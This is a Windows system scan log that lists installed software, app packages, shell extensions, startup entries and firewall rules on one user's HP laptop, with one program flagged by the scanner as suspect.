HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.7960.5089 - Hewlett-Packard)
HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.01.39 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{78E2C850-ADA6-420D-BA35-2F4A9BE733CC}) (Version: 8.8.24.33 - HP)
HP Support Information (HKLM-x32\...\{B2B7B1C8-7C8B-476C-BE2C-049731C55992}) (Version: 13.00.0000 - Hewlett-Packard)
HP Support Solutions Framework (HKLM-x32\...\{5F084DD8-AF2C-4004-9C92-820C32E4BD55}) (Version: 12.15.14.3 - HP)
HP Touchpoint Analytics Client (HKLM\...\{E5FB98E0-0784-44F0-8CEC-95CD4690C43F}) (Version: 4.0.2.1439 - HP Inc.)
Hugin (HKLM\...\{C64F9956-580A-4D11-AFA0-C567B2A17B7B}) (Version: 16.2.0.0 - Hugin developer team)
Inst5675 (HKLM\...\{2DE6247C-7077-451B-8BA7-FFD1A2ABBB47}) (Version: 8.01.39 - Softex Inc.) Hidden
Inst5676 (HKLM\...\{878F6913-7421-4713-97F7-0A736EE2A188}) (Version: 8.01.39 - Softex Inc.) Hidden
Intel® Chipset Device Software (HKLM-x32\...\{fb610cea-ba50-4d4b-a717-cf025419035c}) (Version: 10.1.1.13 - Intel® Corporation) Hidden
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1173 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.5058 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.8.0.1042 - Intel Corporation)
Intel® Update Manager (HKLM-x32\...\{7224B7CE-196C-4E2A-A1AE-1D7BF259FD36}) (Version: 3.4.1942 - Intel Corporation)
Intel® WiDi (HKLM\...\{2F97FBC6-7992-4DF7-A7C7-B68455E307F7}) (Version: 5.1.20.0 - Intel Corporation)
Intel® Wireless Bluetooth® (HKLM-x32\...\{915DDCDE-7767-4B4A-9256-8729B265BDAC}) (Version: 17.1.1440.02 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{f8c930bd-0a68-425f-8c11-87723d1e2c97}) (Version: 20.90.0 - Intel Corporation)
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
iTunes (HKLM\...\{D75FB6A7-8D3C-4159-AE6D-42E1820E1B68}) (Version: 12.10.5.12 - Apple Inc.)
Junk Mail filter update (HKLM-x32\...\{0BE9E708-5DC0-4963-9CFD-0AA519090E79}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Levels 1, 2 & 3 Download 5-User Edition (HKLM-x32\...\{F469F826-0F89-4488-BC78-57511A90DC77}) (Version: 1.1.21 - TOPICS Entertainment)
Malwarebytes Anti-Malware version 1.70.0.1100 (HKLM-x32\...\Malwarebytes' Anti-Malware_is1) (Version: 1.70.0.1100 - Malwarebytes Corporation)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4641.1005 - Microsoft Corporation)
Microsoft Office Standard 2016 (HKLM\...\Office16.STANDARD) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\OneDriveSetup.exe) (Version: 19.232.1124.0012 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Teams (HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\Teams) (Version: 1.3.00.8663 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{38F03569-A636-4CF3-BDDE-032C8C251304}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM\...\{90160000-001F-040C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Product Improvement Study for HP ENVY 7640 series (HKLM\...\{C15C2D78-89D2-4EC1-850D-4D9BFADA758A}) (Version: 40.11.1135.17143 - HP Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10125.31214 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7673 - Realtek Semiconductor Corp.)
SAntivirus Realtime Protection Lite (HKLM-x32\...\SAntivirus) (Version: 1.0.21.32 - Digital Com. Inc) <==== ATTENTION
Seagate Dashboard (HKLM-x32\...\{EA266F00-A8E7-43A0-8DED-FBFE3F076934}) (Version: 4.9.2.0 - Seagate)
Search Powered by Yahoo! (HKLM-x32\...\{2E10C6D0-7E90-1750-CF10-67D01F90B450}) (Version: - )
Spotify (HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\Spotify) (Version: 1.1.29.592.gf0779179 - Spotify AB)
Unchecky v1.2 (HKLM-x32\...\Unchecky) (Version: 1.2 - Reason Software Company Inc.)
Update for Skype for Business 2016 (KB4484286) 64-Bit Edition (HKLM\...\{90160000-0012-0000-1000-0000000FF1CE}_Office16.STANDARD_{5F64605A-1F38-44BE-BB99-1799A6D11A62}) (Version: - Microsoft)
Update for Skype for Business 2016 (KB4484286) 64-Bit Edition (HKLM\...\{90160000-00C1-0000-1000-0000000FF1CE}_Office16.STANDARD_{5F64605A-1F38-44BE-BB99-1799A6D11A62}) (Version: - Microsoft)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{16AD6161-2E47-4BF1-AA77-0946EFE93E08}) (Version: 2.61.0.0 - Microsoft Corporation)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Wondershare Helper Compact 2.5.3 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.5.3 - Wondershare)

Packages:
=========
Autodesk SketchBook -> C:\Program Files\WindowsApps\89006A2E.AutodeskSketchBook_5.1.0.0_x64__tf1gferkr813w [2019-11-05] (Autodesk Inc.)
Getting Started with Windows 8 -> C:\Program Files\WindowsApps\AD2F1837.GettingStartedwithWindows8_1.6.0.0_neutral__v10z8vjag6ke6 [2016-05-14] (Hewlett-Packard Company)
Hearts Deluxe -> C:\Program Files\WindowsApps\26720RandomSaladGamesLLC.HeartsDeluxe_6.6.26.0_x64__kx24dqmazqk8j [2020-01-26] (Random Salad Games LLC) [MS Ad]
HP Connected Drive -> C:\Program Files\WindowsApps\AD2F1837.HPFileViewer_4.4.32.190_x64__v10z8vjag6ke6 [2016-05-14] (HP Inc.)
HP Registration -> C:\Program Files\WindowsApps\AD2F1837.HPRegistration_1.2.1.166_neutral__v10z8vjag6ke6 [2015-06-17] (Hewlett-Packard Company)
HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_110.1.728.0_x64__v10z8vjag6ke6 [2020-04-14] (HP Inc.)
McAfee® Central for HP -> C:\Program Files\WindowsApps\2703103D.McAfeeCentral_5.0.177.1_x64__4ehj4w4frejdr [2018-04-03] (.-McAfee Inc-.)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-15] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-15] (Microsoft Corporation) [MS Ad]
Microsoft Mahjong -> C:\Program Files\WindowsApps\Microsoft.MicrosoftMahjong_3.9.12130.0_x64__8wekyb3d8bbwe [2019-12-19] (Microsoft Studios) [MS Ad]
Microsoft News -> C:\Program Files\WindowsApps\Microsoft.BingNews_4.36.20714.0_x64__8wekyb3d8bbwe [2020-03-24] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.6.4030.0_x64__8wekyb3d8bbwe [2020-04-16] (Microsoft Studios) [MS Ad]
MSN Food & Drink -> C:\Program Files\WindowsApps\Microsoft.BingFoodAndDrink_3.0.4.336_x64__8wekyb3d8bbwe [2016-05-14] (Microsoft Corporation) [MS Ad]
MSN Health & Fitness -> C:\Program Files\WindowsApps\Microsoft.BingHealthAndFitness_3.0.4.336_x64__8wekyb3d8bbwe [2016-05-14] (Microsoft Corporation) [MS Ad]
MSN Money -> C:\Program Files\WindowsApps\Microsoft.BingFinance_4.36.20714.0_x64__8wekyb3d8bbwe [2020-03-24] (Microsoft Corporation) [MS Ad]
MSN Sports -> C:\Program Files\WindowsApps\Microsoft.BingSports_4.36.20714.0_x64__8wekyb3d8bbwe [2020-03-24] (Microsoft Corporation) [MS Ad]
MSN Travel -> C:\Program Files\WindowsApps\Microsoft.BingTravel_3.0.4.336_x64__8wekyb3d8bbwe [2016-05-14] (Microsoft Corporation) [MS Ad]
MSN Weather -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.36.20714.0_x64__8wekyb3d8bbwe [2020-03-24] (Microsoft Corporation) [MS Ad]
mysms - Text from Computer, Messaging -> C:\Program Files\WindowsApps\UptoElevenDigitalSolution.mysms-Textanywhere_3.2.0.0_x64__c9d6r4qvva5x8 [2019-02-01] (Up to Eleven Digital Solutions GmbH)
Netflix -> C:\Program Files\WindowsApps\4DF9E0F8.Netflix_6.96.725.0_x64__mcm4njqhnhss8 [2020-04-12] (Netflix, Inc.)
NOOK – Books, Magazines, Newspapers, Comics -> C:\Program Files\WindowsApps\BarnesNoble.Nook_1.10.1.15_x86__ahnzqzva31enc [2018-06-18] (Barnes & Noble)
Photos Add-on -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos.DLC.Main_2017.39121.36610.0_x64__8wekyb3d8bbwe [2018-12-15] (Microsoft Corporation)
Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-11-20] (Microsoft Corporation)
Simple Solitaire -> C:\Program Files\WindowsApps\26720RandomSaladGamesLLC.SimpleSolitaire_6.18.78.0_x64__kx24dqmazqk8j [2020-03-03] (Random Salad Games LLC) [MS Ad]
The Weather Channel for HP -> C:\Program Files\WindowsApps\Weather.TheWeatherChannelforHP_2015.1108.1.0_x64__t3yemqpq4kp7p [2016-05-14] (The Weather Channel.)
Translator -> C:\Program Files\WindowsApps\Microsoft.BingTranslator_5.6.0.0_x64__8wekyb3d8bbwe [2019-08-17] (Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3444092895-3226993445-944412456-1001_Classes\CLSID\{19A6E644-14E6-4A60-B8D7-DD20610A871D}\InprocServer32 -> C:\Users\JLO Squared\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20031.2\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3444092895-3226993445-944412456-1001_Classes\CLSID\{CB965DF1-B8EA-49C7-BDAD-5457FDC1BF92}\InprocServer32 -> C:\Users\JLO Squared\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20031.2\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVG\Antivirus\ashShell.dll [2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
ContextMenuHandlers1: [CLVDShellExt] -> {3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => C:\Program Files (x86)\Common Files\CyberLink\ShellExtComponent\CLVDShellExt.dll [2015-03-03] (CyberLink Corp. -> Cyberlink)
ContextMenuHandlers1: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers1: [Foxit_ConvertToPDF] -> {C5269811-4A29-4818-A4BB-111F9FC63A5F} => C:\Program Files (x86)\Foxit PhantomPDF\plugins\ConvertToPDFShellExtension_x64.dll [2015-03-03] (Foxit Software Incorporated -> Foxit Software Inc.)
ContextMenuHandlers2: [CLVDShellExt] -> {3E2A0A32-6E14-4BAD-AA87-BBB6A75EBFF2} => C:\Program Files (x86)\Common Files\CyberLink\ShellExtComponent\CLVDShellExt.dll [2015-03-03] (CyberLink Corp. -> Cyberlink)
ContextMenuHandlers3: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamext.dll [2012-12-14] (Malwarebytes Corporation -> Malwarebytes Corporation) [File not signed]
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers5: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.37.0.dll [2020-04-01] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2018-09-19] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVG\Antivirus\ashShell.dll [2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamext.dll [2012-12-14] (Malwarebytes Corporation -> Malwarebytes Corporation) [File not signed]

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

ShortcutWithArgument: C:\Users\JLO Squared\Desktop\Lifesize Guest.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe (Google LLC) -> --profile-directory=Default --app-id=cgmegfmapkpchpakidcpkjdhpobgeoeo
ShortcutWithArgument: C:\Users\JLO Squared\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Lifesize Guest.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe (Google LLC) -> --profile-directory=Default --app-id=cgmegfmapkpchpakidcpkjdhpobgeoeo
ShortcutWithArgument: C:\Users\JLO Squared\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\d249d9ddd424b688\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default

==================== Loaded Modules (Whitelisted) =============

2019-02-21 21:00 - 2019-02-21 21:00 - 000078336 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="2"

==================== Association (Whitelisted) =================

==================== Internet Explorer trusted/restricted ==========

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 05:25 - 2020-04-29 12:04 - 000002103 _____ C:\WINDOWS\system32\drivers\etc\hosts

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;c:\Program Files\Intel\WiFi\bin\;c:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files\Hewlett-Packard\SimplePass\;C:\Program Files (x86)\Windows Live\Shared;C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL;C:\Program Files\Intel\Intel® Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT;C:\Program Files\Intel\Intel® Management Engine Components\IPT;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img13.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run32: => "DBAgent"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\StartupApproved\StartupFolder: => "EvernoteClipper.lnk"
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\StartupApproved\Run: => "Uploader"
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\StartupApproved\Run: => "Chromium"
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_A3B55F10413EDA3726B7768FB296E183"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{5C608EC7-892F-4E65-9021-63D8A9261FBE}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe (Intel Corporation -> )
FirewallRules: [{A213BC19-CF64-4D88-8B7A-E7F56E3D83C8}] => (Allow) C:\Program Files\Intel Corporation\USB over IP\bin\UoipService.exe (Intel® Wireless Display -> Intel)
FirewallRules: [{2F46AA1C-95F3-4268-AD13-67E5AE4E3A48}] => (Allow) LPort=8888
FirewallRules: [{26D54691-B934-4B25-967C-55C9BA4D3DEE}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{3FBF4668-1575-49E3-B035-1BD66D5EBA80}] => (Allow) LPort=1900
FirewallRules: [{0F7394F7-8C37-4D04-87B3-D883AD3EEA32}] => (Allow) LPort=2869
FirewallRules: [{393A2089-6D6E-4E90-B6F1-1FA79D92C667}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{56303450-2E97-4203-82C2-C7522651DF35}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{756B7453-67C8-4AD4-A941-F4FC262DE221}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{45ABC1E7-4EA2-4E0B-9AC9-7E131B1FBECD}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{F6C8CB9C-1EA8-43CA-A386-879ECAC8C94C}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{077F17D4-1446-4933-9117-AAEB441FC768}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe No File
